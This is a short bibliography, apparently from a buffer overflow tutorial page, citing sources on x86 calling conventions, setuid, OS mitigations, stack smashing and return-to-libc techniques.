[2] Wikipedia, the free encyclopedia, "x86 calling conventions," Wikimedia Foundation. [Online]. Available: http://en.wikipedia.org/wiki/X86_calling_conventions. [Accessed: Apr. 30, 2010].

[3] G. Bugher, "OS-Based Mitigations Against Common Attacks," Perimeter Grid. [Online]. Available: http://perimetergrid.com/wp/2008/02/04/os-based-mitigations-against-common-attacks/. [Accessed: Apr. 30, 2010].

[4] A. One, "Smashing the Stack for Fun and Profit," Phrack, vol. 7, no. 49, Aug. 11, 1996. [Online]. Available: Phrack, http://www.phrack.com/issues.html?issue=49&id=14. [Accessed: Mar. 29, 2010].

[5] Wikipedia, the free encyclopedia, "setuid," Wikimedia Foundation. [Online]. Available: http://en.wikipedia.org/wiki/Setuid. [Accessed: Apr. 30, 2010].

[6] Wikipedia, the free encyclopedia, "Buffer overflow," Wikimedia Foundation. [Online]. Available: http://en.wikipedia.org/wiki/Buffer_overflow#NOP_sled_technique. [Accessed: Apr. 30, 2010].

[7] c0ntex, "Bypassing non-executable-stack during exploitation using return-to-libc," infosecwriters.com. [Online]. Available: http://www.infosecwriters.com/text_resources/pdf/return-tolibc.pdf. [Accessed: Mar. 29, 2010].

From: http://turkeyland.net/projects/overflow/references.php